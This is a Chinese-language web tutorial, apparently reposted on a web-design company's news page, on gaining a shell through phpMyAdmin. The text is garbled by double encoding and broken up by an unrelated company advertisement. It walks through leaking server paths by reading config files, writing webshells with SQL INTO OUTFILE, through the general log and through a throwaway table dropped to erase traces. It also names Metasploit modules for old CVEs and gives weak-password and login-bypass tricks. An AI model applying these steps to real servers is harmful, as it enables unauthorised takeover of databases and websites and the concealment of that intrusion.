建站
咨詢(xún)
售后
建站咨詢(xún)
新聞中心
本篇內(nèi)容介紹了“phpMydmin的簡(jiǎn)介以及GetShell的用法”的有關(guān)知識(shí),在實(shí)際案例的操作過(guò)程中,不少人都會(huì)遇到這樣的困境,接下來(lái)就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧!希望大家仔細(xì)閱讀,能夠?qū)W有所成!
phpMyadmin簡(jiǎn)介
成都創(chuàng)新互聯(lián)公司是專(zhuān)業(yè)的城子河網(wǎng)站建設(shè)公司,城子河接單;提供網(wǎng)站制作、網(wǎng)站設(shè)計(jì),網(wǎng)頁(yè)設(shè)計(jì),網(wǎng)站設(shè)計(jì),建網(wǎng)站,PHP網(wǎng)站建設(shè)等專(zhuān)業(yè)做網(wǎng)站服務(wù);采用PHP框架,可快速的進(jìn)行城子河網(wǎng)站開(kāi)發(fā)網(wǎng)頁(yè)制作和功能擴(kuò)展;專(zhuān)業(yè)做搜索引擎喜愛(ài)的網(wǎng)站,專(zhuān)業(yè)的做網(wǎng)站團(tuán)隊(duì),希望更多企業(yè)前來(lái)合作!
phpMyadmin是一個(gè)以PHP為基礎(chǔ)的數(shù)據(jù)庫(kù)管理工具,使網(wǎng)站管理員可通過(guò)Web接口管理數(shù)據(jù)庫(kù) 。信息收集
此部分主要需要收集的是網(wǎng)站物理路徑,否則后續(xù)無(wú)法通過(guò)URL連接Shell物理路徑
查詢(xún)數(shù)據(jù)庫(kù)存儲(chǔ)路徑來(lái)推測(cè)網(wǎng)站物理路徑,也可以通過(guò)log變量得到select @@datadir;
配置文件爆路徑:如果注入點(diǎn)有文件讀取權(quán)限,可通過(guò)load_file嘗試讀取配置文件# Windows c:\windows\php.ini # php配置文件 c:\windows\system32\inetsrv\MetaBase.xml # IIS虛擬主機(jī)配置文件 # Linux /etc/php.ini # php配置文件 /etc/httpd/conf.d/php.conf /etc/httpd/conf/httpd.conf # Apache配置文件 /usr/local/apache/conf/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache/conf/extra/httpd-vhosts.conf # 虛擬目錄配置文件
單引號(hào)爆路徑:直接在URL后面加單引號(hào)。要求單引號(hào)沒(méi)有被過(guò)濾(gpc=off)且默認(rèn)返回錯(cuò)誤信息。
www.abc.com/index.php?id=1'
錯(cuò)誤參數(shù)值爆路徑:嘗試將要提交的參數(shù)值改成錯(cuò)誤值。
www.abc.com/index.php?id=-1
Nginx文件類(lèi)型錯(cuò)誤解析爆路徑:要求Web服務(wù)器是Nginx,且存在文件類(lèi)型解析漏洞。在圖片地址后添加/x.php,該圖片不但會(huì)被當(dāng)作php文件執(zhí)行,還有可能爆出物理路徑。
www.abc.com/bg.jpg/x.php
Google爆路徑site:xxx.com warning site:xxx.com “fatal error”
測(cè)試文件爆路徑www.xxx.com/test.php www.xxx.com/ceshi.php www.xxx.com/info.php www.xxx.com/phpinfo.php www.xxx.com/php_info.php www.xxx.com/1.php
其它phpMyAdmin/libraries/selectlang.lib.php phpMyAdmin/darkblueorange/layout.inc.php phpmyadmin/themes/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang[]=1 phpMyAdmin/darkblueorange/layout.inc.php phpMyAdmin/index.php?lang[]=1 /phpmyadmin/libraries/lect_lang.lib.php /phpMyAdmin/phpinfo.php /phpmyadmin/themes/darkblue_orange/layout.inc.php /phpmyadmin/libraries/select_lang.lib.php /phpmyadmin/libraries/mcrypt.lib.php其它信息
phpMyadmin后臺(tái)面板可以直接看到MySQL版本、當(dāng)前用戶(hù)、操作系統(tǒng)、PHP版本、phpMyadmin版本等信息
也可以通過(guò)SQL查詢(xún)得到其它信息select version(); -- 查看數(shù)據(jù)庫(kù)版本 select @@datadir; -- 查看數(shù)據(jù)庫(kù)存儲(chǔ)路徑 show VARIABLES like '%char%'; -- 查看系統(tǒng)變量GetShell前提條件網(wǎng)站真實(shí)路徑。如果不知道網(wǎng)站真實(shí)路徑則后續(xù)無(wú)法
通過(guò)URL的方式連shell讀寫(xiě)權(quán)限。查詢(xún)secure_file_priv參數(shù),查看是否具有讀寫(xiě)文件權(quán)限,若為NULL則沒(méi)有辦法寫(xiě)入shell。
這個(gè)值是只讀變量,只能通過(guò)配置文件修改,且更改后需重啟服務(wù)才生效select @@secure_file_priv -- 查詢(xún)secure_file_priv -- secure_file_priv=NULL,禁止導(dǎo)入導(dǎo)出 -- secure_file_priv='',不限制導(dǎo)入導(dǎo)出 -- secure_file_priv=/path/,只能向指定目錄導(dǎo)入導(dǎo)出 select load_file('c:/phpinfo.php'); -- 讀取文件 select '123' into outfile 'c:/shell.php'; -- 寫(xiě)入文件常規(guī)GetShell
直接通過(guò)SQL查詢(xún)寫(xiě)入shell-- 假設(shè)物理路徑為 "G:\phpStudy\WWW" select '' into outfile 'G:/phpStudy/WWW/shell.php';日志GetShell
MySQL5.0版本以上會(huì)創(chuàng)建日志文件,通過(guò)修改日志的全局變量打開(kāi)日志并指定日志保存路徑,再通過(guò)查詢(xún)寫(xiě)入一句話木馬,此時(shí)該木馬會(huì)被日志記錄并生成日志文件,從而GetShell。但是前提是要對(duì)生成的日志文件有讀寫(xiě)權(quán)限。
查詢(xún)?nèi)罩救肿兞?p> show variables like '%general%'; Variable_name Value general_log OFF general_log_file G:\phpStudy\MySQL\data\FengSec.loggeneral_log:日志保存狀態(tài)
general_log_file:日志保存路徑
開(kāi)啟日志保存并配置保存路徑set global general_log = "ON"; -- 打開(kāi)日志保存 set global general_log_file = "G:/phpstudy/WWW/log.php"; -- 設(shè)置日志保存路徑,需先得知網(wǎng)站物理路徑,否則即使寫(xiě)入了Shell也無(wú)法通過(guò)URL連接
寫(xiě)shellselect '';新表GetShell
進(jìn)入一個(gè)數(shù)據(jù)庫(kù),新建數(shù)據(jù)表。
名字隨意,這里為shell_table
字段數(shù)填1
添加字段
字段名任意,這里為xiaoma
字段類(lèi)型為T(mén)EXT
在該表中點(diǎn)擊插入,值為一句話木馬'
執(zhí)行SQL查詢(xún),將該表中的內(nèi)容導(dǎo)出到指定文件-- 假設(shè)物理路徑為 "G:\phpStudy\WWW" select * from shell_table into outfile "G:/phpstudy/WWW/shell.php";
刪除該表,抹除痕跡Drop TABLE IF EXISTS shell_table;
以上步驟也可以通過(guò)MySQL語(yǔ)句執(zhí)行Create TABLE shell_table (xiaoma text NOT NULL) -- 建表 Insert INTO shell_table (xiaoma) VALUES(''); -- 寫(xiě)入 select * from shell_table into outfile 'G:/phpstudy/WWW/shell.php'; -- 導(dǎo)出 Drop TABLE IF EXISTS shell_table; -- 刪表特殊版本GetShell
CVE-2013-3238
影響版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
利用模塊:exploit/multi/http/phpmyadminpregreplace
CVE-2012-5159
影響版本:phpMyAdmin v3.5.2.2
利用模塊:exploit/multi/http/phpmyadmin3522_backdoor
CVE-2009-1151
PhpMyAdmin配置文件/config/config.inc.php存在命令執(zhí)行
影響版本:2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
利用模塊:exploit/unix/webapp/phpmyadmin_config
弱口令&萬(wàn)能密碼
弱口令:版本phpmyadmin2.11.9.2, 直接root用戶(hù)登陸,無(wú)需密碼
萬(wàn)能密碼:版本2.11.3 / 2.11.4,用戶(hù)名'localhost'@'@"則登錄成功
分享文章:phpMydmin的簡(jiǎn)介以及GetShell的用法
文章鏈接:http://www.ef60e0e.cn/article/cphoid.html
